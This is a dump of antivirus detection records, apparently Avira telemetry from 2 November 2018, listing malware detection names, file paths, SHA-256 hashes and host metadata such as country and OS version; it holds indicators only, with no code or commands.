  Row(detection=Row(filename='avscan-20181102-055607-f6307fa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055607-F6307FA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150125-7cb4c4ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6879e40\\AVSCAN-20181102-150010-73E24B7E\\AVSCAN-20181102-150125-7CB4C4AC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052203-33fbefbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052203-33FBEFBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123354-41771dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cb62c39\\AVSCAN-20181102-123129-2C346BB9\\AVSCAN-20181102-123354-41771DAB', filesize=512000, name='Worm/Delf.512553.#M1.#R1'), hash='7123b8bf12905ac0865284300759bc17d13c9f105fffd3b854dd901b43f040a1', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061433-892eda27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061433-892EDA27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa11652.23941\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa11652.23941\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:33:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kbwkjpgo.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\kbwKjpgO.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:22:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061700-e0cc828a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061700-E0CC828A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051638-71d409dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051638-71D409DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054713-b80efe5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054713-B80EFE5F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053503-04df996c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053503-04DF996C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052323-63c3344f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052323-63C3344F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060337-0235a08f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060337-0235A08F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055027-2ba420f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055027-2BA420F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061613-c50bb569', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061613-C50BB569', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054752-ced48dfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054752-CED48DFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054928-087e15e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054928-087E15E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051011-8b65f9bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051011-8B65F9BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060842-b7ee3cea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060842-B7EE3CEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055153-5e7e2492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055153-5E7E2492', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060024-8f532449', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060024-8F532449', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052033-fe3b2fba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052033-FE3B2FBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051012-8c1049bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051012-8C1049BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055017-25929358', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055017-25929358', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062659-45d22d34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062659-45D22D34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051855-c4021fb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051855-C4021FB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051632-6ebfd5ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051632-6EBFD5AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052415-82a3aa99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052415-82A3AA99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053642-3fc3dc36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053642-3FC3DC36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062000-4c6002f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062000-4C6002F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060401-10705038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060401-10705038', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062127-804dc6aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062127-804DC6AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051932-d9af0085', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051932-D9AF0085', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060633-6b7589e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060633-6B7589E1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054356-42524056', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054356-42524056', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054823-e160a189', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054823-E160A189', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055933-709fa175', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055933-709FA175', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061532-ac7e5d1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061532-AC7E5D1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bgm.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\BGM\\BGM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7f3049517e490847ab11be08906c1624e487908b9a963f63644e6c3f785976d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051907-ca9e5853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051907-CA9E5853', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055934-71ae6c68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055934-71AE6C68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054200-fd7a8b94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054200-FD7A8B94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060556-55476372', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060556-55476372', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060200-c8b3c10c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060200-C8B3C10C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054841-ec66ef9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054841-EC66EF9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062247-afac13d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062247-AFAC13D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053214-a013ce06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053214-A013CE06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053410-e4dcb2f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053410-E4DCB2F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053358-ddddca1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053358-DDDDCA1E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052529-aeba152d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052529-AEBA152D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:28Z'), dt=datetime.date(2018, 11, 2)),
